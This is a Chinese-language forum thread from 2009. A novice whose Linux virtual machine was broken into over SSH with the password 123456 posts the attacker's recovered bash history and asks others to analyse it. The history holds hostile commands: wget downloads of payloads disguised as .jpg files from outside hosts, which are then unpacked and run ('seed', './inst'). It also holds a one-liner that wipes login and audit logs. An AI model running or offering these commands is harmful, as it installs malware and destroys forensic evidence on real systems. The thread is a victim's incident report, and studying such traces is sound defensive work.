免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 41359 | 回复: 70
打印 上一主题 下一主题

本人的linux被攻击了!! [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2009-02-20 13:12 |只看该作者 |倒序浏览
昨晚没有关虚拟机 ,里面的linux一直在运行,今天重启系统突然发现我的root密码被改了 !!
于是费了半天劲终于发现,自己的linux被别人ssh以root身份登录以后篡改了我的密码,找到了这段bash的代码 ,好像是在我的系统里进行了一番折腾,情高手帮忙分析一下有没有什么特别的关键的地方被修改了!!

教训,密码太简单了!!123456

w
ps x
uname -a
cat /proc/cpuinfo
cat /etc/hosts
cat /etc/issue
ps -aux
gcc
screen
yum
apt-get
cd /var/spool/at
cd /dev/shm
wget mucul.do.am/doru.jpg
tar -zxvf doru.jpg
rm -rf doru.jpg
cd .sqe
chmod +x seed
cp seed /bin
seed
cd
cd /dev/shm
wget www.mickeyhap.evolink.ro/ssha/sshd.jpg
tar -xzvf sshd.jpg
cd ssh
./inst
ls -a
rm -rf *
ls -a
cd
last
w
ssg 192.168.1.15
ssh 192.168.1.15
ssh 192.168.1.105
netstat -antplu
ps -aux
w
rm -rf .bash_history; rm -rf /var/run/utmp; rm -rf /var/run/wtmp -; rm -rf /var/log/lastlog; rm -rf .bash_history; cd /var/log/; rm -rf wtmp*; rm -rf secure*; rm -rf lastlog*; rm -rf messagess*; touch messagess; touch wtmp; touch secure; touch lastlog; cd /root; rm -rf .bash_history; touch .bash_history   
passwd
less /var/log/sys.log



只知道下载了两个软件 第一个好像是ssh,第二个不太明白 !!!


看了大家这么多的回帖,真的很感动 ,我是linux的初学者装的系统是lfs的是刚刚装好的,基本上没有装任何软件(只有一个ssh),所以很多ip记录啊,抓包的工具都没有装。从命令的历史里面可以看到,那个攻击的人尝试过用apt 和yum来下载那两个包,但是我的系统里面这些工具都是没有的。那个系统我先不用了,自己又在虚拟机上装了一个,等到自己的水平到了以后再去分析一下那两个包到底是什么用的!!
还是要感谢大家的关注!!
那两个包我已经上传了,有兴趣的可以研究一下,第一个包会报有毒!!!


看了31楼的帖子无意中看到“Te descurci sau dai un mail la ”这句,  这个好像是法语或者西班牙语!!!(学过一点点的小语种 !!!!学的不好啊
看来应该不是国人 做的!!!

[ 本帖最后由 renfeide112 于 2009-2-23 10:47 编辑 ]

doru.jpg.tar.gz

215.08 KB, 下载次数: 250

sshd.jpg.tar.gz

2.11 MB, 下载次数: 576

论坛徽章:
36
IT运维版块每日发帖之星
日期:2016-04-10 06:20:00IT运维版块每日发帖之星
日期:2016-04-16 06:20:0015-16赛季CBA联赛之广东
日期:2016-04-16 19:59:32IT运维版块每日发帖之星
日期:2016-04-18 06:20:00IT运维版块每日发帖之星
日期:2016-04-19 06:20:00每日论坛发贴之星
日期:2016-04-19 06:20:00IT运维版块每日发帖之星
日期:2016-04-25 06:20:00IT运维版块每日发帖之星
日期:2016-05-06 06:20:00IT运维版块每日发帖之星
日期:2016-05-08 06:20:00IT运维版块每日发帖之星
日期:2016-05-13 06:20:00IT运维版块每日发帖之星
日期:2016-05-28 06:20:00每日论坛发贴之星
日期:2016-05-28 06:20:00
2 [报告]
发表于 2009-02-20 13:18 |只看该作者
上面的记录是你计算机留下的别人执行命令的记录吗?

论坛徽章:
0
3 [报告]
发表于 2009-02-20 13:21 |只看该作者

回复 #2 Godbach 的帖子


是我在系统root文件夹下的history中找到的 路径是:\root\.bash_history

[ 本帖最后由 renfeide112 于 2009-2-20 13:26 编辑 ]

论坛徽章:
36
IT运维版块每日发帖之星
日期:2016-04-10 06:20:00IT运维版块每日发帖之星
日期:2016-04-16 06:20:0015-16赛季CBA联赛之广东
日期:2016-04-16 19:59:32IT运维版块每日发帖之星
日期:2016-04-18 06:20:00IT运维版块每日发帖之星
日期:2016-04-19 06:20:00每日论坛发贴之星
日期:2016-04-19 06:20:00IT运维版块每日发帖之星
日期:2016-04-25 06:20:00IT运维版块每日发帖之星
日期:2016-05-06 06:20:00IT运维版块每日发帖之星
日期:2016-05-08 06:20:00IT运维版块每日发帖之星
日期:2016-05-13 06:20:00IT运维版块每日发帖之星
日期:2016-05-28 06:20:00每日论坛发贴之星
日期:2016-05-28 06:20:00
4 [报告]
发表于 2009-02-20 13:27 |只看该作者
wget mucul.do.am/doru.jpg
wget

下载了两个文件,而且应该是压缩包。

论坛徽章:
36
IT运维版块每日发帖之星
日期:2016-04-10 06:20:00IT运维版块每日发帖之星
日期:2016-04-16 06:20:0015-16赛季CBA联赛之广东
日期:2016-04-16 19:59:32IT运维版块每日发帖之星
日期:2016-04-18 06:20:00IT运维版块每日发帖之星
日期:2016-04-19 06:20:00每日论坛发贴之星
日期:2016-04-19 06:20:00IT运维版块每日发帖之星
日期:2016-04-25 06:20:00IT运维版块每日发帖之星
日期:2016-05-06 06:20:00IT运维版块每日发帖之星
日期:2016-05-08 06:20:00IT运维版块每日发帖之星
日期:2016-05-13 06:20:00IT运维版块每日发帖之星
日期:2016-05-28 06:20:00每日论坛发贴之星
日期:2016-05-28 06:20:00
5 [报告]
发表于 2009-02-20 13:29 |只看该作者
wget mucul.do.am/doru.jpg
tar -zxvf doru.jpg
rm -rf doru.jpg
cd .sqe
chmod +x seed
cp seed /bin
seed
cd
cd /dev/shm
wget
tar -xzvf sshd.jpg
cd ssh
./inst

seed和inst两个可执行文件

论坛徽章:
0
6 [报告]
发表于 2009-02-20 13:29 |只看该作者
看了很多被黑的情况
screen是必打命令

论坛徽章:
0
7 [报告]
发表于 2009-02-20 13:30 |只看该作者

回复 #5 Godbach 的帖子

这个我都知道 就像问问那个seed是个什么软件!!
还有 对我的linux有没有什么隐患,需不需要重新装系统啊!

论坛徽章:
36
IT运维版块每日发帖之星
日期:2016-04-10 06:20:00IT运维版块每日发帖之星
日期:2016-04-16 06:20:0015-16赛季CBA联赛之广东
日期:2016-04-16 19:59:32IT运维版块每日发帖之星
日期:2016-04-18 06:20:00IT运维版块每日发帖之星
日期:2016-04-19 06:20:00每日论坛发贴之星
日期:2016-04-19 06:20:00IT运维版块每日发帖之星
日期:2016-04-25 06:20:00IT运维版块每日发帖之星
日期:2016-05-06 06:20:00IT运维版块每日发帖之星
日期:2016-05-08 06:20:00IT运维版块每日发帖之星
日期:2016-05-13 06:20:00IT运维版块每日发帖之星
日期:2016-05-28 06:20:00每日论坛发贴之星
日期:2016-05-28 06:20:00
8 [报告]
发表于 2009-02-20 13:32 |只看该作者
原帖由 renfeide112 于 2009-2-20 13:30 发表
这个我都知道 就像问问那个seed是个什么软件!!
还有 对我的linux有没有什么隐患,需不需要重新装系统啊!

这个你得搜索一下了。平时用的不多。或者你直接从那个链接上下载下来好了。

你的虚拟机一般是做什么用的,如果涉及到保密的话,还是要慎重考虑一下。

你可以考虑抓包看一下,是不是有异常的链接出去啊。

论坛徽章:
0
9 [报告]
发表于 2009-02-20 13:37 |只看该作者

回复 #8 Godbach 的帖子

我的虚拟机就是供我学习的倒是没有什么重要的东西,
这是我第一次被攻击,对安全有了一个新的认识!!索性没有什么损失!!
我自己再研究一下!
还是要特别感谢啊!!!

论坛徽章:
0
10 [报告]
发表于 2009-02-20 13:42 |只看该作者

回复 #8 Godbach 的帖子

我装的系统是lfs 就是那个自己编译的系统,里面只有一些最基本的软件,samba和sshd是我后来装的,通过samba我查到了那个历史记录的文件 。
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP